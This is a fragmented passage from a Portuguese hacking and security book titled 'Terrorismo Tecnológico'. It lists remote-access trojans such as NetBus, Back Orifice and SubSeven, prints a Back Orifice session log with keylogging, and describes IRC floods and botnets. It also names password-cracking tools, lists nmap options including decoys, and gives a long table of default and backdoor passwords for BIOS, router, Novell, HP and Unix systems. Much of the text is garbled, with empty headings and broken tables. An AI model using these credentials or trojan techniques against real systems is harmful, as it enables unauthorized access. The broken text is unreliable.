mesmo criar um usuário e uma senha para que só a pessoa que o
instalou consiga invadir e usá-lo. Feito isto pela Internet ou uma
Intranet, o “hacker” (vou chamar assim o invasor a partir de agora)
pega o endereço IP do micro infectado e entra em seu sistema. A
partir daí ele escraviza e domina toda a plataforma alheia.
Terrorismo Tecnológico 163
Aprenda Para Sobreviver
8.2 Invasão
- Netbus
- Back Orifice
- Netsphere
- SubSeven
- Hack’a’tack
- Girlfriend
- ackcmd
- Amanda
- Keystroke Logger Achtung
- Backdoor Remote Control
- Aladino Remote Control
Terrorismo Tecnológico 164
Aprenda Para Sobreviver
- Sutrojan
- NC110 UX
- SubSeven
- Sutrojan
Vamos relembrar:
Eles não são muito utilizados, porém são os que mais enganam
os administradores, é instalado um servidor em um computador
digamos de um cliente que o “hacker” arrumou seu servidor
(geralmente o hacker trabalha com informática) e assim possa ser
feitos os ataques. O computador vira um servidor Proxy, e este
como já foi visto no capítulo de anonimidade faz uma espécie de
roteamento, então caso alguém descubra que esta sendo invadido
vai vir procurar na casa nesta máquina e não na casa da máquina
do hacker.
8.5 Camuflando
4
IRC – é um serviço de bate-papo, sendo o Mirc o mais conhecido dele alguns exemplos são,
T7DS, Gasper, Money...
Terrorismo Tecnológico 167
Aprenda Para Sobreviver
8.7.1 Introdução
O NetBus é uma ferramenta que pode ser utilizada como um
sistema de administração remota para os ambientes operacionais
Windows 95, Windows 98 e Windows NT.
É composto por um programa que atua como Servidor e um
programa que atua como Cliente, permitindo conexões remotas
mesmo através da Internet, utilizando-se do protocolo TCP.
Por suas inúmeras características e facilidades, o NetBus
passou a ser utilizado principalmente por hackers que pretendem
manter controle sobre as máquinas de suas vítimas, sem serem
notados/detectados.
8.7.2 Comprometimento
- Auto-instalável
- Auto executável (com o boot do Windows)
- Permite iniciar/executar qualquer aplicativo
- Permite fechar/terminar qualquer aplicativo
- Permite rebootar o servidor
Terrorismo Tecnológico 171
Aprenda Para Sobreviver
8.7.3 Detecção
'NetBus 1.53'
Ou:
'NetBus 1.60'
Alem desse procedimento, é possível examinar o registro do
Windows a procura de algumas chaves que podem ser criadas
pelo programa quando de sua instalação. Execute o 'regedit' e
faca uma busca pelas chaves abaixo:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Cur
rentVersion\Run[Nome
do NetBus]
HKEY_CURRENT_USER\Patch\Settings\ServerPwd
A primeira chave indica que o NetBus está configurado para ser
inicializado automaticamente a cada boot do sistema. Já a
segunda chave indica qual a senha (em formato texto puro) que
esta sendo utilizada para validar conexões.
Especificações:
O pacote bo.zip contém:
8.8.5 Comandos:
Gui/texto:
App add/appadd - abre e redireciona um aplicativo modo texto
para uma porta tcp. Isso permite que você controle o aplicativo
modo texto ou modo dos (como command.com) via telnet.
Terrorismo Tecnológico 176
Aprenda Para Sobreviver
8.8.6 O Manual:
Terrorismo Tecnológico 181
Aprenda Para Sobreviver
** 15:HTTP Enable packet sent (25 bytes) val1: '80' val2: 'c:' ----
------- Packet received from host 195.130.131.69 port 31337 ---------
--HTTP server listening on port 80 ------------------------- End of Data -
------------------
Logging keys
------------------------- End of Data -------------------
** 32:File find packet sent (31 bytes) val1: 'system.txt' val2: 'c:'t '
c\:SYSTEM.TXT 49 -A----- 08-23-98 23:17
c:\Program Files\ICQ\system.txt
End of search
--------------------------- End of Data -------------------------
1. Abra o programa
2. Clique na pasta Configuração, e coloque a mensagem para a
pessoa que tentar lhe invadir. Se quiser, configure um e-mail
para que a tentativa de invasão seja reportada.
3. Clique na pasta Monitorar.
4. Clique no botão Monitorar. Agora clique com o botão direito no
ícone do superman na barra de tarefas e selecione esconder.
5. Simule uma tentativa de invasão indo a Iniciar / Executar e
digitando:
telnet 127.0.0.1 12345
Detecção manual
Terrorismo Tecnológico 188
Aprenda Para Sobreviver
Capítulo IX
• Senha em branco
• Palavras óbvias, como "senha", "pass" ou "password"
• Mesma senha para diversos usuários
• Primeiro e último nome do usuário
• Nome da esposa/marido, pais ou filhos
• Informação sobre si mesmo (placa do carro, data de
nascimento, telefone, CPF).
• Somente números
• Palavra contida em dicionário sendo nacional ou
extrangeiro
• Palavra com menos de 6 caracteres
De Word
Use o programa wfwcd.zip com (19,8k)
De ZIP
Use o programa zipcrack.zip com (12,3k)
DE ARJ
Use o programa brkarj10.zip com (13,1k)
Terrorismo Tecnológico 193
Aprenda Para Sobreviver
Needed
SMC
Accton
Contributed by:
Capítulo X
Spam – A praga
Terrorismo Tecnológico 199
Aprenda Para Sobreviver
Não há muito que fazer neste caso a não ser usar o antivírus
para a proteção, e se o sistema travar só resta mesmo reiniciá-lo e
após isso tentar apagar este e-mail.
Terrorismo Tecnológico 201
Aprenda Para Sobreviver
Capítulo XI
11.1 Introdução
11.2 Flood
11.6 Netsplit
11.7 Pedindo ao OP
11.9 Nuke
11.11 Botnet/Floodnet
É cada vez mais difícil usar clones sem ser pego. Você precisa
de uma maneira de usar o flood sem ser detectado. Como fazer
isso? Floodnet. Existem dois tipos diferentes de Floodnet. O
primeiro é com Eggdrop bots, esses botnets são compreendidos
como eggdrops ligados, e tem um script de flood comum. Existem
botnets com muitas centenas de ligações. É muito difícil parar o
flood deles. A outra maneira, é usar scripts individuais. Os scripts
têm comandos comuns, e permitem que usuários com o mesmo
script de se liguem, para juntos combinarem seus clones. Existem
vantagens e desvantagens dos dois. As vantagens dos botnets é
que estão sempre online porque estão em um Shell. Mas as
desvantagens é que não são tão dinâmicos quanto uns clones
floodnet.
Terrorismo Tecnológico 209
Aprenda Para Sobreviver
Capítulo XII
12.1 Introdução
Na pratica.
Terrorismo Tecnológico 211
Aprenda Para Sobreviver
12.4 Roteadores
12.5 Anti-Sniffers
(Bons Sniffers)
• DNMENG
• ICMP DATA SNIFFER
• LANGUARD
• SHOMITI
• IRIS (provavelmente o melhor!)
Terrorismo Tecnológico 214
Aprenda Para Sobreviver
Capítulo XIII
13.1 Introdução
Nº da porta – Serviços:
EPA! Netbus é um trojan, isto quer dizer que ele esta instalado e
ativo. Pronto agora sabemos que a rede está infectada.
E é assim mesmo que um invasor faz, vai scanneando pela
Internet até achar alguém que já esteja contaminado.
O nmap é uma ótima ferramenta para scannear redes, ele tem como
função ver os computadores que estão ativos e quais serviços estão
sendo fornecidos.
Uma versão pode ser obtida em http://www.insecure.org/nmap/ e
como a versão é aberta o código pode ser obtido em:
ftp://ftp.ee.lbl.gov/libpcap.tar.z
-sT
-sS
-sP
-sU
Terrorismo Tecnológico 225
Aprenda Para Sobreviver
-sO
-sA
-sW
-sR
-P0
-PT
-PS
Terrorismo Tecnológico 230
Aprenda Para Sobreviver
-PI
-PB
-O
-I
-f
-v
-h
-oN <logfilename>
-oX <logfilename>
-oG <logfilename>
-oS <logfilename>
--resume <logfilename>
-iL <inputfilename>
-iR
-p <port ranges>
-D <decoy1 [,decoy2][,ME],...>
-S <IP_Address>
Terrorismo Tecnológico 238
Aprenda Para Sobreviver
-e <interface>
-g <portnumber>
-r
--randomize_hosts
-M <max sockets>
OPÇÕES DE TEMPO
-T <Paranoid|Sneaky|Polite|Normal|Aggressive|Insane>
--host_timeout <milliseconds>
--max_rtt_timeout <milliseconds>
--min_rtt_timeout <milliseconds>
--initial_rtt_timeout <milliseconds>
--max_parallelism <number>
--scan_delay <milliseconds>
nmap -v target.example.com
Capítulo XIV
14.1 Introdução
Porém nunca estará 100% seguro, a não ser que passe o resto
da vida buscando sites que façam a conversão!
IRC - Internet Relay Chat, definido pelo RFC 1459, mas com
várias extensões usadas atualmente, foi um protocolo criado por
Jarkko Oikarinnen em 1989 para estender o protocolo talk do Unix a
uma interface mais poderosa de conferências e conversação virtual.
Trata-se de uma conversação em um ambiente distribuído com
vários usuários simultâneos, espalhados por vários servidores
interligados entre si.
Vejamos no quadro!
Capítulo XV
15.4 Então...
Terrorismo Tecnológico 259
Aprenda Para Sobreviver
15.4.1 Hkey_Local_Machine
15.4.2 Hkey_Current_Config
15.4.3 Hkey_Dyn_Data
15.4.4 Hkey_Classes_Root
15.4.5 Hkey_Users
15.4.6 Hkey_Current_User
15.4.7 Hkey_Local_Machine\Config
15.4.8 Hkey_Local_Machine\Software
15.4.9 Hkey_Local_Machine\System
Método 1:
Método 2:
Método 1:
Método 2 :
Método 3:
Método 4:
DIGITE:
CD C:\WINDOWS
attrib -h -r -s system.dat
attrib -h -r -s system.da0
attrib -h -r -s user.dat
attrib -h -r -s user.da0
4. Reinicie a máquina.
Método 5 :
Terrorismo Tecnológico 265
Aprenda Para Sobreviver
1. De um boot na máquina.
2. Tecle CTRL até que apareça o menu de inicializações do
Windows 98.
3. Escolha somente prompt de comando.
4. Digite :
Scanreg/fix: se quiser restaurar a cópia da última inicialização do
sistema.
15.6 Dicas:
o sistema HKEY_LOCAL_MACHINE\System\CurrentContr
de 16-bit olSet\ Control\FileSystem
para 32-bit b- Dê um duplo click no lado direito da tela com
(nomes o botão direito do mouse
longos em c- Escolha novo, valor binário
qualquer d- Nomeie-o de: NameNumericTail e dê enter
arquivo de e- Dê um duplo click no valor que você criou e
qualquer coloque 0 (zero) como valor binário completo.
software f- Click Ok e reinicie o Windows.
sendo 16
ou 32 bit).
Aqueles
nomes do
tipo Meus
~documen
tos.
help
desses
ícones,
faça o
seguinte:
Acabe 1. Execute o registro
com o 2. Abra as pastas na sequência:
Prompt de Meu
Logoff. Computador/HKEY_CURRENT_USER\Sotware\
Aquele do Mi
menu crosoft\Windows\CurrentVersion\Polices\Explore
iniciar r.
Efetuar Escolha Editar|Novo\Valor Binário. Nomeia a
Logoff de nova entrada como : NoLogoff. Pressione enter
<Nome- e defina o seguinte valor : 01 00 00 00. Pronto,
do- de um boot.
usuário>
Acabe 1. Abra o editor de Registro.
com o 2. Abra as pastas na sequência:
menu Meu
favoritosComputador/HKEY_CURRENT_USER\Sotware\
no Menu Mi
crosoft\Windows\CurrentVersion\Polices\Explore
Iniciar .
r.
Escolha Editar|Novo\Valor DWORD. Nomeia a
nova entrada como : NoFavoritesMenu.
Pressione enter e defina o seguinte valor : 01 00
00 00. Pronto, de um boot.
Recebe 1. Abra o editor de Registro.
mensagen 2. Abra as pastas na sequência
s do tipo HKEY_LOCAL_MACHINE\SYSTEM\CURRENT
Site Not CONTROLSET\SERVICES\VXD\MSTCP.
Found ? Escolha Editar|Novo\Valor da Sequencia.
Nomeia a nova entrada como : DefaultTTL
Clique com o botão direito do mouse sobre a
nova entrada e escolha modificar e digite 64.
Eliminar 1. Abra o editor de Registro.
Terrorismo Tecnológico 272
Aprenda Para Sobreviver
Página HKEY_LOCAL_MACHINE\Software\Microsoft\Int
Inicial. ernet Explorer\Main.
Você
poderá
altear a
página
inicial do
seu
navegador
.
Arquivos C:\Windows\System\Homepage.inf
Intrusos C:\Windows\System\Iedkcs32.dll
que são C:\Windows\System\User.dat
instalados C:\Windows\System\Wavemix.ini
no seu Faça um backup desses arquivos antes de
compotad instalar esses Cds de provedores depois é só
or por restaurar a configuração original com essas
estes Cds cópias.
de
provedore
s de
acesso
sem a sua
permição.
HKEY_LOCAL_MACHINE\Software\Microsoft\W
Modificar indows\CurrentVersion\Setup\SourcePath.
a origen Estando aí é só mudar o endereço dos arquivos
dos de instalação.
arquvos
de
configura
ção.
Alguma
vez já
tentou
instalar
um
Terrorismo Tecnológico 274
Aprenda Para Sobreviver
componen
te do
Windows
ou algúm
hardware
e ele te
perguntou
a caminho
dos
arquivos
de
instalação
do
Windows
? Veja
como
mudar.
Você rola HKEY_LOCAL_USER\Software\Microsoft\Office\
atela do 8.0\Word\Options.
Word e Escolha Editar|Novo\Valor da Sequencia.
nãao sabe Nomeia a nova entrada como : LiveScrooling
onde ela Clique com o botão direito do mouse sobre a
vai parar ? nova entrada e escolha modificar o valor e digite
Mude isso 1. Da próxima vez que tentar rolar a barra num
. arquivo grande o deslize será bem suave e
gradativo.
15.7.27 Propriedades
F2 Renomear
F3 Localizar
ALT+ENTER Propriedades
F5 Atualiza
CTRL+Z Desfazer
No Windows Explorer
Em Propriedades
F5 Atualiza a tela
F1 Ajuda
Teclas de acessibilidade
Win+E Explorer
{645FF040-5081-101B-9F08-00AA002F954E}\DEFAULTICON.
Depois vc coloca o caminho dos ícones vazis, no (padrão) e no
empty, depois o ícone cheio no valor full e pronto, depois vc tem de
reiniciar!
Sim, podem. Agora, isso não significa que há sempre alguém lendo
a sua correspondência. Com milhões de pessoas na Internet, as
novas mensagens individuais se perdem na multidão. Mas como
você sabe, quando uma mensagem parte do seu sistema, ela pode
chegar a um outro computador localizado a centenas e até milhares
de quilômetros de distancia, e você não tem como saber quem tem
acesso a ela. Mesmo que ninguém leia a sua correspondência
enquanto esta estiver em trânsito, o destinatário poderá encaminhá-
la a quem bem desejar. Mas nem tudo está perdido - existem
maneiras de tornar o seu e-mail mais seguro. Uma delas consiste
em criptografar a sua mensagem antes de enviá-la. Criptografar
significa simplesmente transformá-la em uma seqüência de códigos
que só podem ser decifrados com a chave apropriada. Ao ser
recebida, a mensagem deverá ser descriptografada no equipamento
destinatário. Enviar mensagens pelo Netscape 2.02 e Internet
Explorer 2 é relativamente seguro. Não sou hacker! Sou somente
uma pessoa que adora computadores há muito tempo e com a
Internet teve a chance de disponibilizar informações sobre
informática para outras pessoas e assim haver a troca de
informações. Também sou absolutamente contra a pirataria, ou seja
a cópia de programas. Legalize sua cópia pirata! Também não
existe nenhum livro ou material específico em como ser tornar um
hacker. Não existe uma fórmula mágica e nem como se tornar um
hacker do dia para a noite. Um hacker se faz após anos de muita
leitura e estudo. Basicamente toda a informação que você necessita
para se tornar um hacker já está disponível na rede, o que você tem
que fazer é vasculhar e achar as informações. Está certo que isto
não é uma tarefa muito fácil, mas quem disse que ser um hacker é
Terrorismo Tecnológico 292
Aprenda Para Sobreviver
Capítulo XVI
BUGS - Falhas
Terrorismo Tecnológico 294
Aprenda Para Sobreviver
16.1 Introdução
16.8 No Linux
O linux também tem muitos erros, só no primeiro trimestre de 2003
foram descobertos mais de 500 bugs diferentes.
Uma falha na biblioteca para compressão de software utilizada em
todas as versões do Linux pode deixar a parte principal do sistema
suscetível a ataques de hackers.
O bug, conhecido como buffer overflow (sobrecarregamento de
buffer), leva as funções principais do gerenciamento de memória no
zlib a falharem e, nesta condição, permite que pessoas com
conhecimento técnico aperfeiçoado assumam o controle de
computadores Linux via Internet.
A vulnerabilidade afeta qualquer versão do Linux que utilize a
biblioteca zlib para descompressão, incluindo o software principal do
sistema operacional - o kernel.
Terrorismo Tecnológico 298
Aprenda Para Sobreviver
16.9 Correção
http://pv2fd.pav2.hotmail.msn.com/cgi-
bin/saferd?_lang=EN&hm___tg=http%3a%2f%2f64%2e4%2e3
6%2e250%2fcgi%2dbin%2fgetmsg&hm___qs=%26msg%3dMSG99
8047250%2e22%26start%3d9702%26len%3d96
87%26raw%3d0%26disk%3d64%2e4%2e36%2e68_d1577%26login
%3dusername%26domain%3dhotmail%2ecom&
hm___fl=attrd&domain=hotmail.com
remova = "%26raw%3d0"
remova "&hm___fl=attrd&domain=hotmail.com"
Terrorismo Tecnológico 300
Aprenda Para Sobreviver
Capítulo XVII
Crackeando
Terrorismo Tecnológico 301
Aprenda Para Sobreviver
17.1 Wordlists
d e
Integrati
on
Alteon ACEswitc 180 HTTP admin admin Admin
h e
Alteon ACEswitc 180 Telnet admin (none)
h e
AMI PC BIOS Console n/a AM Admin
AMI PC BIOS Console n/a AMI Admin
AMI PC BIOS Console n/a A.M.I Admin
AMI PC BIOS Console n/a AMI_S Admin
W
AMI PC BIOS Console n/a AMI?S Admin
W
AMI PC BIOS Console n/a aammii Admin
AMI PC BIOS Console n/a AMI!SW Admin
AMI PC BIOS Console n/a AMI.KE Admin
Y
AMI PC BIOS Console n/a AMI.KE Admin
Z
AMI PC BIOS Console n/a AMI~ Admin
AMI PC BIOS Console n/a AMIAMI Admin
AMI PC BIOS Console n/a AMIDE Admin
COD
AMI PC BIOS Console n/a AMIPS Admin
WD
AMI PC BIOS Console n/a amipsw Admin
d
AMI PC BIOS Console n/a AMISET Admin
UP
AMI PC BIOS Console n/a BIOSPA Admin
SS
AMI PC BIOS Console n/a CMOSP Admin
WD
AMI PC BIOS Console n/a HEWIT Admin
T RAND
Amptron PC BIOS Console n/a Polrty Admin
Apache Apache HTTP n/a SDGRO User
Project "jj" script CKS
APC MasterSwi AP apc apc Admin
tch 921
0
APC SNMP 2.x apc apc
Adapter
APC Call-UPS AP Console n/a serial Admin
960 number
8 of the
Call-
UPS
APC Share- AP Console n/a serial Admin
UPS 920 number
7 of the
Share-
Terrorismo Tecnológico 305
Aprenda Para Sobreviver
UPS
APC Web/SNM AP Multi apc apc Admin
P 960
Managem 6
ent Card
APC Powerchut 4.x Console POWERCHUT APC Admin
e Plus for E
Net
war
e
3.x/
4.x
Ascend Router Telnet n/a ascend Admin
AST PC BIOS Console n/a SnuFG5 Admin
Attachm Attachmat Console n/a PASSW Admin
ate e ORD
Gateway
AT&T 3B2 Console n/a mcp Admin
Firmware
Audioac MPEG Telnet n/a telos Admin
tive Realtime
Encoders
Autodes Autocad Multi autocad autocad User
k
AWARD PC BIOS Console n/a Award Admin
AWARD PC BIOS Console n/a AWARD Admin
_SW
AWARD PC BIOS Console n/a SW_A Admin
WARD
AWARD PC BIOS Console n/a lkwpeter Admin
AWARD PC BIOS Console n/a LKWPE Admin
TER
AWARD PC BIOS Console n/a ?award Admin
AWARD PC BIOS Console n/a 256256 Admin
AWARD PC BIOS Console n/a admin Admin
AWARD PC BIOS Console n/a alfarom Admin
e
AWARD PC BIOS Console n/a aLLy Admin
AWARD PC BIOS Console n/a aPAf Admin
AWARD PC BIOS Console n/a award Admin
AWARD PC BIOS Console n/a AWARD Admin
SW
AWARD PC BIOS Console n/a awkwar Admin
d
AWARD PC BIOS Console n/a BIOS Admin
AWARD PC BIOS Console n/a biosstar Admin
AWARD PC BIOS Console n/a biostar Admin
AWARD PC BIOS Console n/a CONCA Admin
T
AWARD PC BIOS Console n/a condo Admin
Terrorismo Tecnológico 306
Aprenda Para Sobreviver
Routers
Biostar PC BIOS Console n/a Biostar Admin
Biostar PC BIOS Console n/a Q54arw Admin
ms
Breezec Breezeco 4.4. n/a Helpdes Admin
om m x k
Adapters
Breezec Breezeco 4.x n/a Super Admin
om m
Adapters
Breezec Breezeco 3.x n/a Master Admin
om m
Adapters
Breezec Breezeco 2.x n/a laflaf Admin
om m
Adapters
Cabletro Netgear netman (none) Admin
n modem/router
and SSR
Cabletro routers & (none) (none)
n switches
Cayman Cayman DSL n/a (none) Admin
CGI Poll It v HTTP n/a protecti User/Adm
World 2. on in over
0 package
Cisco CiscoWorks 2000 admin cisco Admin
Cisco CiscoWorks 2000 guest (none) User
Cisco ConfigMaker cmaker cmaker Admin
Cisco IOS Multi cisco cisco
Cisco IOS Multi enable cisco
Cisco IOS 2 Multi n/a c
6
0
0
s
é
ri
e
s
Cisco IOS Multi n/a cc
Cisco IOS Multi n/a cisco
Cisco IOS Multi n/a Cisco
router
Cisco IOS SNMP public secret Read
ReadOnly
access
Cisco IOS SNMP private secret Read/Writ
ReadWrite e
access
Cisco IOS Multi ripeop (no pw)
Cisco PIX Telnet n/a cisco UID = pix
Cisco- Arrowpoint admin system Admin
Terrorismo Tecnológico 308
Aprenda Para Sobreviver
Arrowpo
int
Compaq Insight Manager administrator administ Admin
rator
Compaq Insight Manager anonymous (none) User
Compaq Insight Manager operator operator
Compaq Insight Manager user public User
Compaq PC BIOS Consol n/a Compa Admin
e q
Compua Cproxy Server A Multi administrator asecret Admin
lynx ll
V
e
rs
io
n
s
Compua Cmail Server A Multi administrator asecret Admin
lynx ll
V
e
rs
io
n
s
Compua SCM A Multi administrator asecret Admin
lynx ll
V
e
rs
io
n
s
Concord PC BIOS n/a last Admin
Crystalvi OutsideView 32 Crystal Admin
ew
CTX PC BIOS Consol n/a CTX_12 Admin
Internati e 3
onal
CyberMa PC BIOS Consol n/a Congre Admin
x e ss
Daewoo PC BIOS Consol n/a Daewuu Admin
e
Dallas TINI embedded < Telnet root tini Admin
Semicon JAVA Module =
ductors 1.
0
Data AOS/VS Multi operator operator Admin
General
Data AOS/VS Multi op op Admin
General
Data AOS/VS Multi op operator Admin
General
Datacom BSASX/101 n/a letmein Admin
Datacom NSBrowse Multi sysadm sysadm Admin
Terrorismo Tecnológico 309
Aprenda Para Sobreviver
Systems
Dynix Dynix Multi LIBRARY (none) User
Library
Systems
Dynix Dynix Multi SETUP (none) Admin
Library
Systems
Efficient Speedstream Telnet n/a admin Admin
DSL
Elsa LANCom Office 8 Telnet n/a cisco Admin
ISDN Router 0
0/
1
0
0
0/
1
1
0
0
Elsa LANCom Office 8 Telnet n/a (none) Admin
ISDN Router 0
0/
1
0
0
0/
1
1
0
0
Enox PC BIOS Consol n/a xo11nE Admin
e
Epox PC BIOS Consol n/a central Admin
e
Ericsson Ericsson Acc netman netman
Flowpoi DSL 2 Telnet admin admin Admin
nt 0
0
0
Flowpoi DSL Telnet n/a passwor Admin
nt d
Flowpoi Flowpoint/2000 Telnet n/a (none) Admin
nt ADSL
Freetech PC BIOS Consol n/a Posterie Admin
e
Galactic Major BBS Multi Sysop Sysop Admin
omm
GuardO Restrictor Multi n/a guardon Admin
ne e
GuardO BizGuard Multi n.a guardon Admin
ne e
glFtpD glFtpD al Consol glftpd glftpd Admin
l e
Hewlett- HP 2000/3000 Multi ADVMAIL HPOFFI
Packard MPE/xx CE,DAT
A
Terrorismo Tecnológico 315
Aprenda Para Sobreviver
Packard MPE/xx T
Hewlett- HP 2000/3000 Multi MGR SYS
Packard MPE/xx
Hewlett- HP 2000/3000 Multi MGR CAROLI
Packard MPE/xx AN
Hewlett- HP 2000/3000 Multi MGR VESOF
Packard MPE/xx T
Hewlett- HP 2000/3000 Multi MGR XLSER
Packard MPE/xx VER
Hewlett- HP 2000/3000 Multi MGR SECUR
Packard MPE/xx ITY
Hewlett- HP 2000/3000 Multi MGR TELES
Packard MPE/xx UP
Hewlett- HP 2000/3000 Multi MGR HPDES
Packard MPE/xx K
Hewlett- HP 2000/3000 Multi MGR CCC
Packard MPE/xx
Hewlett- HP 2000/3000 Multi MGR CNAS
Packard MPE/xx
Hewlett- HP 2000/3000 Multi MGR WORD
Packard MPE/xx
Hewlett- HP 2000/3000 Multi MGR COGN
Packard MPE/xx OS
Hewlett- HP 2000/3000 Multi MGR ROBEL
Packard MPE/xx LE
Hewlett- HP 2000/3000 Multi MGR HPOFFI
Packard MPE/xx CE
Hewlett- HP 2000/3000 Multi MGR HPONL
Packard MPE/xx Y
Hewlett- HP 2000/3000 Multi MGR HPP187
Packard MPE/xx
Hewlett- HP 2000/3000 Multi MGR HPP189
Packard MPE/xx
Hewlett- HP 2000/3000 Multi MGR HPP196
Packard MPE/xx
Hewlett- HP 2000/3000 Multi MGR INTX3
Packard MPE/xx
Hewlett- HP 2000/3000 Multi MGR ITF3000
Packard MPE/xx
Hewlett- HP 2000/3000 Multi MGR NETBA
Packard MPE/xx SE
Hewlett- HP 2000/3000 Multi MGR REGO
Packard MPE/xx
Hewlett- HP 2000/3000 Multi MGR RJE
Packard MPE/xx
Hewlett- HP 2000/3000 Multi MGR CONV
Packard MPE/xx
Hewlett- HP 2000/3000 Multi OPERATOR SYS
Packard MPE/xx
Hewlett- HP 2000/3000 Multi OPERATOR DISC
Packard MPE/xx
Hewlett- HP 2000/3000 Multi OPERATOR SYSTE
Packard MPE/xx M
Hewlett- HP 2000/3000 Multi OPERATOR SUPPO
Packard MPE/xx RT
Terrorismo Tecnológico 317
Aprenda Para Sobreviver
switches Write
Nortel Accelar Multi ro ro Read
(Passport) 1000 Only
séries routing
switches
Nortel Accelar Multi rw rw Read
(Passport) 1000 Write
séries routing
switches
Nortel Accelar Multi rwa rwa Read
(Passport) 1000 Write All
séries routing
switches
Nortel Extranet Multi admin setup Admin
Switches
Nortel Meridian PBX Serial login 0000
Nortel Meridian PBX Serial spcl 0000
Nortel Remote Office Client admin root Admin
9150
Novell Netware Multi ADMIN ADMIN
Novell Netware Multi ADMIN (none)
Novell Netware Multi ARCHIVIST (none)
Novell Netware Multi ARCHIVIST ARCHI
VIST
Novell Netware Multi BACKUP (none)
Novell Netware Multi BACKUP BACKU
P
Novell Netware Multi CHEY_ARCH CHEY_ARCHSVR
SVR
Novell Netware Multi CHEY_ARCH (none)
SVR
Novell Netware Multi FAX FAX
Novell Netware Multi FAX (none)
Novell Netware Multi FAXUSER FAXUSE
R
Novell Netware Multi FAXUSER (none)
Novell Netware Multi FAXWORKS (none)
Novell Netware Multi FAXWORKS FAXWO
RKS
Novell Netware Multi GATEWAY GATEW
AY
Novell Netware Multi GATEWAY GATEW
AY
Novell Netware Multi GATEWAY (none)
Novell Netware Multi GUEST TSEUG
Novell Netware Multi GUEST GUEST
GUEST
Novell Netware Multi GUEST GUEST
GUE
Novell Netware Multi GUEST GUEST
Terrorismo Tecnológico 324
Aprenda Para Sobreviver
/
B
Osicom JETXPrint 1 Telnet sysadm sysadm Admin
0
0
0
E
/
N
Osicom JETXPrint 1 Telnet sysadm sysadm Admin
0
0
0
T
/
N
Osicom JETXPrint 5 Telnet sysadm sysadm Admin
0
0
E
/
B
Osicom NETCommuter Telnet debug d.e.b.u.g User
Remote Access
Server
Osicom NETCommuter Telnet echo echo User
Remote Access
Server
Osicom NETCommuter Telnet guest guest User
Remote Access
Server
Osicom NETCommuter Telnet Manager Manager Admin
Remote Access
Server
Osicom NETCommuter Telnet sysadm sysadm Admin
Remote Access
Server
Osicom NETPrint 1500 E/B Te debug d.e.b.u.g User
lne
t
Osicom NETPrint 1000E/D Te debug d.e.b.u.g User
lne
t
Osicom NETPrint 1000E/NDS Te debug d.e.b.u.g User
lne
t
Osicom NETPrint 1500E/N Te debug d.e.b.u.g User
lne
t
Osicom NETPrint 2000E/N Te debug d.e.b.u.g User
lne
t
Osicom NETPrint 1500 E/B Te echo echo User
lne
t
Osicom NETPrint 1000E/D Te echo echo User
lne
t
Terrorismo Tecnológico 327
Aprenda Para Sobreviver
roles
Telus Telephony Services Multi (created) telus00 User
Telus Telephony Services Multi (created) telus99 User
Tiny PC BIOS Cons n/a Tiny Admin
ole
TMC PC BIOS Cons n/a BIGO Admin
ole
Toshiba PC BIOS Cons n/a 24Banc8 Admin
ole 1
Toshiba PC BIOS Cons n/a Toshiba Admin
ole
Toshiba PC BIOS Cons n/a toshy99 Admin
ole
UNIX Generic Multi adm adm Admin
UNIX Generic Multi adm (none) Admin
UNIX Generic Multi admin admin User
UNIX Generic Multi administr administ User
ator rator
UNIX Generic Multi administr (none) User
ator
UNIX Generic Multi anon anon User
UNIX Generic Multi bbs bbs User
UNIX Generic Multi bbs (none) User
UNIX Generic Multi bin sys Admin
UNIX Generic Multi bin sys Admin
UNIX Generic Multi checkfs checkfs User
UNIX Generic Multi checkfsy checkfsy User
s s
UNIX Generic Multi checksy checksy User
s s
UNIX Generic Multi daemon daemon User
UNIX Generic Multi daemon (none) User
UNIX Generic Multi demo demo User
UNIX Generic Multi demo (none) User
UNIX Generic Multi demos demos User
UNIX Generic Multi demos (none) User
UNIX Generic Multi dni (none) User
UNIX Generic Multi dni dni User
UNIX Generic Multi fal (none) User
UNIX Generic Multi fal fal User
UNIX Generic Multi fax (none) User
UNIX Generic Multi fax fax User
UNIX Generic Multi ftp (none) User
UNIX Generic Multi ftp ftp User
UNIX Generic Multi games games User
Terrorismo Tecnológico 333
Aprenda Para Sobreviver
Capítulo XVIII
Entendendo MS-DOS
Terrorismo Tecnológico 337
Aprenda Para Sobreviver
18.1 MS-DOS
Por ser um dos primeiros S.O. e muito usado até hoje já que é
base para outros Sistemas Operacionais, é muito valido saber um
pouco de como ele funciona.
- exibição de diretórios;
- mudança de PATH;
- cópias de segurança;
- compressão de arquivos;
- parametrização do sistema, etc.
18.7 Outros
sendo feitas por algum tipo de vírus. Os controles feitos pelo vsafe
são:
Capítulo XIX
Unix
Terrorismo Tecnológico 344
Aprenda Para Sobreviver
Por exemplo:
root:fi3sED95ibqR6:0:1:System Operator:/:/bin/csh
daemon:*:1:1::/tmp:
uucp:OORoMN9FyZfNE:4:4::/usr/spool/uucppublic:/usr/lib/uucp/u
ucico
jsilva:eH5/.mj7NB3dx:181:100:José Silva:/u/jsilva:/bin/csh
jsilva username
eH5/.mj7NB3dx senha do usuário cifrada
181 número identificador do usuário (UID)
100 número identificador do grupo ao qual
usuário pertence (GID)
Terrorismo Tecnológico 345
Aprenda Para Sobreviver
19.2 IP Spoofing
19.4 MAIL
19.7.1 PGP
O PGP (Pretty Good Privacy), destina-se a comunicação segura
via e-mail, para isto utiliza-se de criptografia de chave pública.
19.7.2 SSL
Terrorismo Tecnológico 351
Aprenda Para Sobreviver
19.8.1 SATAN
Satan (Security Analysis Tool for Auditing Network) é o mais
complexo sistema de auditoria para sistemas Unix disponível. Ele
coleta a maior quantidade possível de informações sobre um host,
examina os serviços de rede como o finger, o NFS, o NIS, o ftp e o
tftp, rexd entre outros.
19.8.2 TIGER
Muito parecido com o SATAN, o TIGER, é um conjunto de
Bourne Shell (bash) scripts, programas em C e arquivos de dados
que visam fazer uma auditoria de segurança num sistema Unix.
O TIGER sempre tenta descobrir formas que a conta root pode ser
comprometida.
Terrorismo Tecnológico 353
Aprenda Para Sobreviver
Como os:
rm x deleta o arquivo x
Capítulo XX
Q311401
(http://support.microsoft.com/default.aspx?scid=kb;en-
us;Q311401), "Windows 2000 Security Rollup Package 1
Terrorismo Tecnológico 365
Aprenda Para Sobreviver
Q314147
(http://support.microsoft.com/default.aspx?scid=kb;en-
us;Q314147) , "MS02-006: An Unchecked Buffer in the SNMP
Service May Allow Code to Run (Q314147)" (site em inglês)
lançado em 15 de fevereiro de 2002
Q313450
(http://support.microsoft.com/default.aspx?scid=kb;en-
